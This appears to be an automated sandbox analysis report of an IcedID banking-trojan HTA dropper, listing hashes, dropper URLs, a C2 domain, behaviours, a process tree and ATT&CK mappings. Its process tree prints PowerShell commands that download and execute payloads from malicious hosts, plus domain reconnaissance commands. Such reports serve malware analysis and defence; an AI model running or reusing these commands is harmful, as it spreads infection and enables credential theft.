Analysis

  • max time kernel
    149s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    04-02-2023 22:06

General

  • Target

    2.hta

  • Size

    1KB

  • MD5

    78b6f14f36098c269c3d03a29eb35bc8

  • SHA1

    afd76bfe0d6ac105730b218152d0a650b6a869b7

  • SHA256

    c815343206eab5b6d29bea2d12f02bf8f446944554f053203afc414acc77e859

  • SHA512

    57b5a24f6c2610961e5c08d64872290d5b1399a80fc4335e60b88e3d20a679576a108d313b9a710b59e604732e0ea6e91313d65e16a10eb3eda3fe4e503d9712

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://helthbrotthersg.com/view.png

Extracted

Language
ps1
Source
URLs
exe.dropper

https://transfer.sh/get/vpiHmi/invoice.pdf

Extracted

Family

icedid

Campaign

3954321778

C2

ehonlionetodo.com

Signatures

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Blocklisted process makes network request 14 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Discovers systems in the same network 1 TTPs 2 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of WriteProcessMemory 58 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\2.hta"
    1⤵
    • Blocklisted process makes network request
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:884
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -NoP -C (new-object system.net.webclient).downloadFile('http://helthbrotthersg.com/view.png', 'C:\Users\Public\classic.jpg')
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:288
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec Bypass -NoP -C (new-object system.net.webclient).downloadFile('https://transfer.sh/get/vpiHmi/invoice.pdf', 'C:\Users\Public\invoice.pdf'); Start-Process C:\Users\Public\invoice.pdf
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:672
    • C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Public\classic.jpg,PluginInit
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1912
      • C:\Windows\system32\rundll32.exe
        "C:\Windows\System32\rundll32.exe" C:\Users\Public\classic.jpg,PluginInit
        3⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Accesses Microsoft Outlook profiles
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        • outlook_office_path
        • outlook_win_path
        PID:1436
        • C:\Windows\system32\cmd.exe
          cmd.exe /c chcp >&2
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1600
          • C:\Windows\system32\chcp.com
            chcp
            5⤵
              PID:564
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1760
          • C:\Windows\system32\ipconfig.exe
            ipconfig /all
            4⤵
            • Gathers network information
            PID:908
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:1172
          • C:\Windows\system32\net.exe
            net config workstation
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1148
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 config workstation
              5⤵
                PID:1776
            • C:\Windows\system32\nltest.exe
              nltest /domain_trusts
              4⤵
                PID:628
              • C:\Windows\system32\nltest.exe
                nltest /domain_trusts /all_trusts
                4⤵
                  PID:2028
                • C:\Windows\system32\net.exe
                  net view /all /domain
                  4⤵
                  • Discovers systems in the same network
                  PID:1712
                • C:\Windows\system32\net.exe
                  net view /all
                  4⤵
                  • Discovers systems in the same network
                  PID:848
                • C:\Windows\system32\net.exe
                  net group "Domain Admins" /domain
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1216
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 group "Domain Admins" /domain
                    5⤵
                      PID:2020

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Execution

            Command-Line Interface

            1
            T1059

            Defense Evasion

            Modify Registry

            1
            T1112

            Credential Access

            Credentials in Files

            1
            T1081

            Discovery

            System Information Discovery

            3
            T1082

            Remote System Discovery

            1
            T1018

            Collection

            Data from Local System

            1
            T1005

            Email Collection

            1
            T1114

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
              Filesize

              340B

              MD5

              2459c952068a2b2153873409df5e7814

              SHA1

              792ac7137f576ae525f5227cf7386b71863f9636

              SHA256

              023cef2e6e7976b88df6d8e0030a86897fd9296630631780c21b12bcb3e764ec

              SHA512

              bdb3157b05a2671c4ec573088e1c9c6b274ae0eb9f1f3dbde8cada2db8bba73d042035cf9faa8df6877831638e983a9a1860c651626531bbef8eabd5574ca33d

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
              Filesize

              7KB

              MD5

              88aeab0039cfae0c1162500b5e8691e8

              SHA1

              b864d7f26373bac3343073df41d99ad4d0248a9b

              SHA256

              d6003bea1e577c4150d70a7b79bc50ee445458966a01e6bf7154ff0a10929578

              SHA512

              07aff64fb142ad75f8351bdc39da6f895536d30741ed762f632d27e56d9d2b8c6eca7d79b383fc176e621891318714e12239e6124a710fadf92df6b0a0878d7f

            • C:\Users\Public\classic.jpg
              Filesize

              291KB

              MD5

              6b1e64957316e65198e3a1f747402bd6

              SHA1

              f4df8c9d37a76eadf1125a74865032d83920123b

              SHA256

              fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe

              SHA512

              dfc44776ec1bef64531228f9894e22a6f84a3009382044265ae51fb9cc664e8565516a3c969860548256a225902a2129709859269121f6c1ee784fc56194d2ff

            • \??\PIPE\NETLOGON
              MD5

              d41d8cd98f00b204e9800998ecf8427e

              SHA1

              da39a3ee5e6b4b0d3255bfef95601890afd80709

              SHA256

              e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

              SHA512

              cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

            • \Users\Admin\AppData\Local\Temp\sqlite64.dll
              Filesize

              1.8MB

              MD5

              26d773a69f6fad3200d49a7aaa77752b

              SHA1

              3970ffe8aefe0c30daaec65b85fb103c0fc0f2a7

              SHA256

              fca6b7fe66ad9973f18f407e83b56dacd04197cbd35efc498a342d73d6a113e5

              SHA512

              0041b52514460dda19dd065fc46393f6fbe248a4c62fce28e0819abd952756996b34fdea286eb7814a7c868a12656a065278932760e61e53f7102b0dba324e4f

            • \Users\Public\classic.jpg
              Filesize

              291KB

              MD5

              6b1e64957316e65198e3a1f747402bd6

              SHA1

              f4df8c9d37a76eadf1125a74865032d83920123b

              SHA256

              fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe

              SHA512

              dfc44776ec1bef64531228f9894e22a6f84a3009382044265ae51fb9cc664e8565516a3c969860548256a225902a2129709859269121f6c1ee784fc56194d2ff

            • \Users\Public\classic.jpg
              Filesize

              291KB

              MD5

              6b1e64957316e65198e3a1f747402bd6

              SHA1

              f4df8c9d37a76eadf1125a74865032d83920123b

              SHA256

              fbad60002286599ca06d0ecb3624740efbf13ee5fda545341b3e0bf4d5348cfe

              SHA512

              dfc44776ec1bef64531228f9894e22a6f84a3009382044265ae51fb9cc664e8565516a3c969860548256a225902a2129709859269121f6c1ee784fc56194d2ff

            • memory/288-61-0x0000000070600000-0x0000000070BAB000-memory.dmp
              Filesize

              5.7MB

            • memory/288-60-0x0000000070600000-0x0000000070BAB000-memory.dmp
              Filesize

              5.7MB

            • memory/288-54-0x0000000000000000-mapping.dmp
            • memory/564-78-0x0000000000000000-mapping.dmp
            • memory/628-85-0x0000000000000000-mapping.dmp
            • memory/672-62-0x0000000070600000-0x0000000070BAB000-memory.dmp
              Filesize

              5.7MB

            • memory/672-59-0x0000000070600000-0x0000000070BAB000-memory.dmp
              Filesize

              5.7MB

            • memory/672-56-0x0000000075DF1000-0x0000000075DF3000-memory.dmp
              Filesize

              8KB

            • memory/672-55-0x0000000000000000-mapping.dmp
            • memory/848-89-0x0000000000000000-mapping.dmp
            • memory/908-80-0x0000000000000000-mapping.dmp
            • memory/1148-83-0x0000000000000000-mapping.dmp
            • memory/1172-81-0x0000000000000000-mapping.dmp
            • memory/1216-90-0x0000000000000000-mapping.dmp
            • memory/1436-76-0x000007FEFB731000-0x000007FEFB733000-memory.dmp
              Filesize

              8KB

            • memory/1436-70-0x0000000001AF0000-0x0000000001B3C000-memory.dmp
              Filesize

              304KB

            • memory/1436-69-0x0000000000120000-0x0000000000129000-memory.dmp
              Filesize

              36KB

            • memory/1436-67-0x0000000000000000-mapping.dmp
            • memory/1600-77-0x0000000000000000-mapping.dmp
            • memory/1712-88-0x0000000000000000-mapping.dmp
            • memory/1760-79-0x0000000000000000-mapping.dmp
            • memory/1776-84-0x0000000000000000-mapping.dmp
            • memory/1912-63-0x0000000000000000-mapping.dmp
            • memory/2020-91-0x0000000000000000-mapping.dmp
            • memory/2028-86-0x0000000000000000-mapping.dmp